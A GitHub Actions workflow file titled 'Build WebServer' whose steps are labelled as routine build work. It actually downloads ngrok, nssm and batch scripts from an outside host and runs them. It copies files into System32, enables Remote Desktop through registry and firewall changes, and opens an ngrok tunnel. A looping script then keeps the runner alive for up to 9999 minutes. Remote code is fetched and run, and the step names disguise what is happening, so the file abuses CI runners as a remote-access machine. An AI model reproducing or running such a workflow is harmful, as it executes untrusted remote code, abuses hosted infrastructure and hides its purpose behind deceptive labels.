name: Build WebServer 
on: workflow_dispatch

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download Source Files 
      run: |
        Invoke-WebRequest https://d.darkarmy.eu.org/rdp/ngrok.exe -OutFile ngrok.exe
        Invoke-WebRequest https://d.darkarmy.eu.org/rdp/nssm.exe -OutFile nssm.exe
    - name: Copying Source Files to Build Directory
      run: | 
        copy nssm.exe C:\Windows\System32
        copy ngrok.exe C:\Windows\System32
    - name: Connect to Local Development Server
      run: .\ngrok.exe authtoken $Env:SERVER_AUTH
      env:
        SERVER_AUTH: ${{ secrets.SERVER_TOKEN }}
    - name: Download Important Files
      run: |
        Invoke-WebRequest https://d.darkarmy.eu.org/rdp/NGROK-AP.bat -OutFile NGROK-AP.bat
        Invoke-WebRequest https://d.darkarmy.eu.org/rdp/NGROK-CHECK.bat -OutFile NGROK-CHECK.bat
        Invoke-WebRequest https://d.darkarmy.eu.org/rdp/loop.bat -OutFile loop.bat
    - name: Make Configure Files For Target Systems 
      run: start NGROK-AP.bat
    - name: Enable Configuration Access 
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Start Unix Sock Tunnel
      run: sc start ngrok
    - name: Build Ready 
      run: cmd /c NGROK-CHECK.bat
    - name: Finish
      run: cmd /c loop.bat 
